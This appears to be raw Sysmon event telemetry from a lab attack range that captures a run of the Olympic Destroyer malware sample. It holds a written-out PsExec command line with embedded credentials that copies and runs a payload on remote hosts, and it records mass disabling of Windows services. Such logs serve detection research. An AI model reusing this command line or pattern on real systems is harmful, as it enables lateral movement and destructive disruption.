10:56:43.562{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EB-6216-6E05-000000003802}6480C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.560{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EB-6216-6D05-000000003802}6488C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EB-6216-6B05-000000003802}6184C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12EB-6216-6C05-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-12EB-6216-6B05-000000003802}6184C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x8000000000000000290985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-12EB-6216-6C05-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.430{C8EA50B7-12EB-6216-6B05-000000003802}6184C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 154100x8000000000000000290983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.430{C8EA50B7-12EB-6216-6C05-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000290982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EB-6216-6C05-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.428{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EB-6216-6B05-000000003802}6184C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000290980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.282{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F105B23B1AE3F3B99CE59178B36668DC,SHA256=D7CC92FBC95EDED5793B1A750168D9F441A51A841379D4259169D120D5C0E7AB,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000290979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\xinputhid\StartDWORD (0x00000004) 13241300x8000000000000000290978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\xenvif\StartDWORD (0x00000004) 13241300x8000000000000000290977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\xenvbd\ImagePath\SystemRoot\system32\DRIVERS\xenvbd.sys 12241200x8000000000000000290976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\xenvbd\StartOverride 13241300x8000000000000000290975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\xenvbd\StartDWORD (0x00000004) 13241300x8000000000000000290974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\xennet\StartDWORD (0x00000004) 13241300x8000000000000000290973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\xeniface\StartDWORD (0x00000004) 13241300x8000000000000000290972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\xenfilt\ImagePath\SystemRoot\system32\DRIVERS\xenfilt.sys 13241300x8000000000000000290971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\xenfilt\StartDWORD (0x00000004) 13241300x8000000000000000290970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\XENBUS\ImagePath\SystemRoot\system32\DRIVERS\xenbus.sys 12241200x8000000000000000290969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\XENBUS\StartOverride 13241300x8000000000000000290968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\XENBUS\StartDWORD (0x00000004) 13241300x8000000000000000290967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\xboxgip\StartDWORD (0x00000004) 23542300x8000000000000000290966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.213{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=67C117E227B1C74BE03075A7ED55A64E,SHA256=B2EE2BEB9FE0C350AFFF2CA914D1D67D35F8F8D02A47C7E5C5B41EE714670499,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000290965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\XblGameSave\StartDWORD (0x00000004) 13241300x8000000000000000290964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.213{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\XblAuthManager\StartDWORD (0x00000004) 13241300x8000000000000000290963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\wudfsvc\StartDWORD (0x00000004) 13241300x8000000000000000290962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WUDFRd\StartDWORD (0x00000004) 13241300x8000000000000000290961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WudfPf\StartDWORD (0x00000004) 13241300x8000000000000000290960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\wuauserv\StartDWORD (0x00000004) 13241300x8000000000000000290959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WSearch\StartDWORD (0x00000004) 13241300x8000000000000000290958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ws2ifsl\StartDWORD (0x00000004) 13241300x8000000000000000290957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnService\StartDWORD (0x00000004) 13241300x8000000000000000290956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpdUpFltr\StartDWORD (0x00000004) 13241300x8000000000000000290955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WPDBusEnum\StartDWORD (0x00000004) 13241300x8000000000000000290954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Wof\StartDWORD (0x00000004) 13241300x8000000000000000290953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\wmiApSrv\StartDWORD (0x00000004) 13241300x8000000000000000290952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WmiAcpi\StartDWORD (0x00000004) 13241300x8000000000000000290951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\wlidsvc\StartDWORD (0x00000004) 13241300x8000000000000000290950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\wisvc\StartDWORD (0x00000004) 13241300x8000000000000000290949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WinVerbs\StartDWORD (0x00000004) 13241300x8000000000000000290948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.197{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WINUSB\StartDWORD (0x00000004) 13241300x8000000000000000290947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 